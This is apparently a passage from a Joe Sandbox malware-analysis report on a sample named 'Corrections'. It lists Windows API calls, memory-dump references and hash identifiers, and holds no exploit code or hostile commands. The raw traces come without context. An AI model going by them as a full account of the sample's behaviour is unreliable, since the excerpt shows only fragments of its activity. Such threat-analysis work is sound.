                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00986547
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 0098656C
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00986596
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dbe720f559b3dcf32bb08f7d127584f46034728843006ac07a6bca0821d94694
                                                                                                                                                                                                                                                                                            • Instruction ID: 1cebdf3dd9d01e26b7047656b62a8a2bf3ce28be6bd657c82d8fe7e7960bb089
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbe720f559b3dcf32bb08f7d127584f46034728843006ac07a6bca0821d94694
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1718D31900605EFDB20EFA8CE85BAEBBF9FF48714F100918E186A66A0D775E940DB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 009A0884
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 009A088F
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 009A089A
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 009A08A5
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 009A08B0
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 009A08BB
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 009A08C6
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 009A08D1
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 009A08DC
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 009A08E7
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 009A08F2
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 009A08FD
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 009A0908
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 009A0913
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 009A091E
                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 009A0929
                                                                                                                                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 009A0939
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009A097B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5970e46c4a6d70d57d67e044a30f224c79c1b6caab5fff8adb2d2bafaa0dae3d
                                                                                                                                                                                                                                                                                            • Instruction ID: dfa0152514a5f865dbec15e9facda3522029b370a4596cca479134fe61e96af5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5970e46c4a6d70d57d67e044a30f224c79c1b6caab5fff8adb2d2bafaa0dae3d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC4152B0D083196ADB109FBA8C8986EBFE8FF44754B50452AE11CE7291DB789801CF91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00940436
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094045D: InitializeCriticalSectionAndSpinCount.KERNEL32(009F170C,00000FA0,72A42B44,?,?,?,?,00962733,000000FF), ref: 0094048C
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00962733,000000FF), ref: 00940497
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00962733,000000FF), ref: 009404A8
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009404BE
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009404CC
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009404DA
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00940505
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00940510
                                                                                                                                                                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00940457
                                                                                                                                                                                                                                                                                              • Part of subcall function 00940413: __onexit.LIBCMT ref: 00940419
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • kernel32.dll, xrefs: 009404A3
                                                                                                                                                                                                                                                                                            • InitializeConditionVariable, xrefs: 009404B8
                                                                                                                                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00940492
                                                                                                                                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 009404C4
                                                                                                                                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 009404D2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                            • Opcode ID: 57cf70bbb556857cb1a615625c5f0ffdda6465dbc2d2d71e6097b6d0e709b80c
                                                                                                                                                                                                                                                                                            • Instruction ID: 6b76ede25b66252819a48d0fef370acf69ce00921ab730c2a6a8769b2a627a5e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57cf70bbb556857cb1a615625c5f0ffdda6465dbc2d2d71e6097b6d0e709b80c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19210B32E5D705AFD7142BA5AD46F693798EFC4B75F000229FB05972D0EF749C009A91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                            • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                            • Opcode ID: a169b669d2be14d1c5892361bd4d03a0b690f6a88c745ee608935fc6c9604046
                                                                                                                                                                                                                                                                                            • Instruction ID: c8213228e3ac494141e5868d1fcb31031c3e051d26c0dc0af2436ce84cc7e840
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a169b669d2be14d1c5892361bd4d03a0b690f6a88c745ee608935fc6c9604046
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E1E332E04516ABCB28AF74C841BFEBBB8BF54B50F14C129E456E7350DB34AE458790
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,009BDCD0), ref: 00994F6C
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00994F80
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00994FDE
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00995039
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00995084
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009950EC
                                                                                                                                                                                                                                                                                              • Part of subcall function 0093FD52: _wcslen.LIBCMT ref: 0093FD5D
                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,009E7C10,00000061), ref: 00995188
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                            • Opcode ID: 0c6f2e9b884a0b146d85ddcf81c3b0445b4bd0c933e518b1d5afe7c93f1bf567
                                                                                                                                                                                                                                                                                            • Instruction ID: 49111bb16c8a3bb1d7359c028155337a7d33bbd2903839465b3162541f8a83ac
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c6f2e9b884a0b146d85ddcf81c3b0445b4bd0c933e518b1d5afe7c93f1bf567
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFB1E1316087029FCB21DF2CD890A6BB7E9AFD4724F15491DF49A87295DB30DC85CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009ABBF8
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009ABC10
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009ABC34
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009ABC60
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009ABC74
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009ABC96
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009ABD92
                                                                                                                                                                                                                                                                                              • Part of subcall function 00990F4E: GetStdHandle.KERNEL32(000000F6), ref: 00990F6D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009ABDAB
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009ABDC6
                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009ABE16
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 009ABE67
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 009ABE99
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009ABEAA
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009ABEBC
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009ABECE
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 009ABF43
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 81d9dd89f8801636f607efe316cbb1c3cc6dd7c1e5306fcfd412f930880d9a86
                                                                                                                                                                                                                                                                                            • Instruction ID: 066b255a664e5d14cfe05def0e9a8bd46d0cc837bf685550ed33af2bd741c758
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81d9dd89f8801636f607efe316cbb1c3cc6dd7c1e5306fcfd412f930880d9a86
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1F1C0716083409FC714EF24C891B6ABBE5BFC5314F18895DF8958B2A6DB31EC41CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,009BDCD0), ref: 009A4B18
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009A4B2A
                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,009BDCD0), ref: 009A4B4F
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,009BDCD0), ref: 009A4B9B
                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,009BDCD0), ref: 009A4C05
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 009A4CBF
                                                                                                                                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009A4D25
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 009A4D4F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                            • Opcode ID: d462c54044d029f88155bc1fb5478cdedf64ea2af9a10edc011ae40e48df52a7
                                                                                                                                                                                                                                                                                            • Instruction ID: 9bcda9f7e2135c96bd492406afe76b56b08ac77bf50f804e9932b3035f52e56b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d462c54044d029f88155bc1fb5478cdedf64ea2af9a10edc011ae40e48df52a7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06124D71A00115EFDB14DF94C884EAEB7B9FF86314F248098F919AB251D7B1ED46CBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(009F29C0), ref: 00963F72
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(009F29C0), ref: 00964022
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00964066
                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0096406F
                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(009F29C0,00000000,?,00000000,00000000,00000000), ref: 00964082
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0096408E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 7bb8e5e96d3d4d5bb59aae3f6c1f049352695659877c1bbfb45ac77bf804e392
                                                                                                                                                                                                                                                                                            • Instruction ID: 68dd9a389e132790573ccc81d6569a88fbce2864e03f42407ae461eeec9c48df
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bb8e5e96d3d4d5bb59aae3f6c1f049352695659877c1bbfb45ac77bf804e392
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8713870604215BFFB219F69DC49FAABFA8FF44364F108216F6146A1E1C7B5AD10DB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?), ref: 009B7823
                                                                                                                                                                                                                                                                                              • Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009B7897
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009B78B9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009B78CC
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 009B78ED
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00920000,00000000), ref: 009B791C
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009B7935
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 009B794E
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 009B7955
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009B796D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009B7985
                                                                                                                                                                                                                                                                                              • Part of subcall function 00922234: GetWindowLongW.USER32(?,000000EB), ref: 00922242
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                            • Opcode ID: 5ffbf3dc449a10565674bf64435194bc832cad0829510dfb8ebe6072c92d85e8
                                                                                                                                                                                                                                                                                            • Instruction ID: 5fa4b6eb55099ddb4a0c6a863ddca66a6e5243eedf7fb20f5c09ec3e95f1f320
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ffbf3dc449a10565674bf64435194bc832cad0829510dfb8ebe6072c92d85e8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF71BA70108244AFD725CF98CD88FBABBE9FBC9320F14065DF894872A1DB70A946DB11
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0
                                                                                                                                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 009B9BA3
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B80AE: ClientToScreen.USER32(?,?), ref: 009B80D4
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B80AE: GetWindowRect.USER32(?,?), ref: 009B814A
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B80AE: PtInRect.USER32(?,?,?), ref: 009B815A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 009B9C0C
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009B9C17
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009B9C3A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 009B9C81
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 009B9C9A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 009B9CB1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 009B9CD3
                                                                                                                                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 009B9CDA
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 009B9DCD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
